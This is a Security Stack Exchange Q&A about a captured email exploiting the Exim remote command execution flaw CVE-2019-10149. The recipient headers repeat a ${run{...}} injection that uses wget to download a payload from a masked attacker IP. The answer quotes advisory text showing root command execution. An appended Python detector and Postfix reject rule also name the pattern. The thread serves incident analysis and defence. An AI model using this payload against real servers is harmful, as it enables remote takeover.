
Today I found an extremely unusual email in my catchall inbox, without subject, sender or content. My Gmail client for Android reported the mail was sent by me, triggering a nuclear alert in my mind.

I feared that someone had guessed my robust password and that this mail came from my mail transfer agent (MTA), so I rushed to look at both the email itself and the mail logs. That did not happen.

I found what looks to me like an attempt to exploit a mail server vulnerability that neither fail2ban nor I have ever heard of.

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <000701d52665$301b5e30$90521a90$@Domain>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==

Analysis: the sender tried to alter the mail destination in order to launch the following (encoded) command and exploit a potential remote code execution vulnerability, where sequences of Xes denote an IP address.

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#

Despite sht-ct being something I'm not familiar with (or mistranslated during my manual URL-decoding), I start from the assumption that all attackers know I use Postfix as the MTA on my server.

Question:

I would like to confirm whether this is, as I suspect, a real attempt to conduct a remote command execution attack with a crafted email. Secondarily, I urgently need to assess whether I have been pwned, in ways other than looking carefully at top and crontab. I need to understand whether this attack affects my MTA or tries to exploit an outdated and already-fixed vulnerability.

I just rushed to update Postfix, but without knowing the vulnerability (or whether it affects Postfix at all), I have little clue.

The reason I rush to ask security questions about MTAs on public forums is that, in my opinion and experience, hacked mail server boxes can start to cause lots of damage in an extremely short time compared to other kinds of services, and that requires acting quickly.

usr-local-ΕΨΗΕΛΩΝ
  • Looks like they are trying to exploit an issue in the X-Original-To header parser; this could be related to a Postfix issue or to another MTA. Check on the Postfix mailing list or look directly at the source code. – camp0 Jun 19 '19 at 07:03
  • This appears to be SMTP Injection via recipient email addresses. https://www.mbsd.jp/Whitepaper/smtpi.pdf – cremefraiche Jun 19 '19 at 07:08
  • @cremefraiche excellent. Considering the article is dated 2015 and I keep my MTA up to date, I may assume this attack is not a 0-day and that I might be already protected against it. – usr-local-ΕΨΗΕΛΩΝ Jun 19 '19 at 07:13
  • @usr-local-ΕΨΗΕΛΩΝ I did a cursory search and found a CVE that references ruby mail gem <2.5.5. Unsure if this helps you: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9097 https://nvd.nist.gov/vuln/detail/CVE-2015-9097. Can't speak to the possibility of a zero-day, but I would search around for command injection related to your mail stack and see if anything newer comes up. – cremefraiche Jun 19 '19 at 07:19
  • I have accepted @SteffenUllrich's answer (and am going to add a few lines of details) because it perfectly matches the attack pattern. This Q&A could potentially help others in the following days/weeks to urge them to update EXIM if they use it. – usr-local-ΕΨΗΕΛΩΝ Jun 19 '19 at 07:42
  • I'm seeing this same attack pattern on one of the Postfix servers I manage, which began yesterday around 3:13pm CT. The "Received" notations in the email led me to think there might have been a successful download, but I'm not seeing any obvious signs in `/tmp`. – Nathan Jun 19 '19 at 16:03
  • "*I would like to know if this [bit of code I am posting on a publicly accessible SEO-optimized website as part of a high-visibility Hot Network Question] is a recent known or 0-day vulnerability.*" If the answer was *yes,* do you think posting it here would really be the best course of action, for everybody else's security? (Meta discussion [here](https://security.meta.stackexchange.com/q/3215/79319).) – WBT Jun 19 '19 at 20:45
  • @WBT, yes, it made me feel much better to see someone else with some information; anyone scanning this site to exploit such information must be outwitted by the true purpose of the followers of this site, or else security.stackexchange itself is to be called into question. This site serves as the source of the cure for immediate issues, or it isn't as much of a "hot network" frontline benefactor as might be hoped. – Motomotes Jun 20 '19 at 04:22
  • @Motes Are you assuming that everyone who might possibly be vulnerable to the attack reads this SE and this question specifically, especially as quickly as it's posted? I don't think that's a fair assumption. – WBT Jun 20 '19 at 13:17
  • @camp0, if I could downvote comments, I'd downvote yours. Why is it the first response of so many people to "look at the source code"? That I know what I'm doing enough to run an MTA does not mean I can decipher and interpret the source code of a package I'm using, any more than being able to drive makes me a qualified mechanic. – Darren Jun 20 '19 at 13:58
  • @WBT, I can't seriously read your reply, it is so presumptive. Anyone is not everyone, somewhere is not everywhere; just because something is not everything and it is not everywhere does not mean it is not anywhere. – Motomotes Jun 20 '19 at 14:48
  • @Nathan I had the same suspicion, but I had to admit that an executable malware downloaded and executed from tmp would obviously delete itself and conceal its presence under different directories. In your shoes, I would take a **deep** look at `top`, `crontab` and `init.d`. The answer only *suggests* Postfix is not vulnerable, but who knows for sure. – usr-local-ΕΨΗΕΛΩΝ Jun 21 '19 at 12:35
  • @Darren Learning the language most of your userspace is written in is a very useful skill. It's not that difficult to learn, especially because reading code is easier than writing it. While ostensibly a sysadmin might never need to know C, the reality is that many problems can be traced down to a bug in the code, and waiting potentially weeks, months, or years for it to be discovered independently isn't always a great solution when your web server suddenly stops accepting connections and maxes out all CPU cores. – forest Jun 26 '19 at 06:26

1 Answer


This is an attempt to exploit the current remote code execution issue in the EXIM mail server, i.e. CVE-2019-10149. See The Return of the WIZard: RCE in Exim for details and also the kind of exploit you encountered. You are safe if you are not using EXIM or run a fixed version.

From the linked article (emphasis added):

This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations). To remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes). However, because of the extreme complexity of Exim's code, we cannot guarantee that this exploitation method is unique; faster methods may exist.

[...]

Because expand_string() recognizes the "${run{ }}" expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to "${run{...}}@localhost" (where "localhost" is one of Exim's local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
Steffen Ullrich
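To triage headers like the ones in the question, and to show in decoded form the `${run{...}}` expansion item the answer describes, here is an added Python example (not code from the question, the answer or the Exim advisory): it unfolds a header block, finds every `${run{...}}` item in a header value, and decodes the `\xHH`/`xHH` and `\t` escapes to the command they hide. The header sample is constructed to match the shape of the question's mail; `192.0.2.10` and `203.0.113.5` are documentation-range placeholders, not the addresses the poster saw.

```python
import re

# Constructed sample, shaped like the headers in the question. The IP addresses are
# documentation-range placeholders (RFC 5737), not the attacker's real addresses.
SAMPLE_HEADERS = (
    "Received: from service.com (unknown [203.0.113.5])\n"
    "    by example.org (Postfix) with SMTP\n"
    "    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20192.0.2.10x2ftmpx2f192.0.2.10x22}}@example.org>;"
    " Wed, 19 Jun 2019 04:42:50 +0200 (CEST)\n"
    "X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20192.0.2.10x2ftmpx2f192.0.2.10x22}}@example.org\n"
    "X-Mailer: Microsoft Outlook 16.0\n"
)

# Exim's ${run{...}} expansion item; the payload in the wild has no nested braces.
RUN_EXPANSION = re.compile(r"\$\{run\{([^}]*)\}\}")


def decode_escapes(s):
    """Undo the Exim string escapes used to hide the command: \\t -> tab, \\n -> newline,
    \\xHH -> byte HH. A bare xHH (backslash already stripped by some filter or
    log writer, as in the question's headers) is decoded the same way."""
    s = re.sub(r"\\t", "\t", s)
    s = re.sub(r"\\n", "\n", s)
    return re.sub(r"\\?x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def unfold(headers):
    """Join RFC 5322 continuation lines so that each header occupies one line."""
    return re.sub(r"\r?\n[ \t]+", " ", headers)


def find_run_expansions(headers):
    """Return (header_name, raw_expansion, decoded_command) for every ${run{...}}
    item found in a header value; an empty list means no injection attempt seen."""
    hits = []
    for line in unfold(headers).splitlines():
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        for m in RUN_EXPANSION.finditer(value):
            hits.append((name.strip(), m.group(0), decode_escapes(m.group(1))))
    return hits


if __name__ == "__main__":
    for name, raw, cmd in find_run_expansions(SAMPLE_HEADERS):
        print(f"{name}: {raw}\n  decoded: {cmd!r}")
```

On a Postfix front end the same pattern can be refused at SMTP time with a PCRE `check_recipient_access` table (a `/\$\{run\{/ REJECT` rule under `smtpd_recipient_restrictions`), even though Postfix itself does not evaluate Exim expansion items.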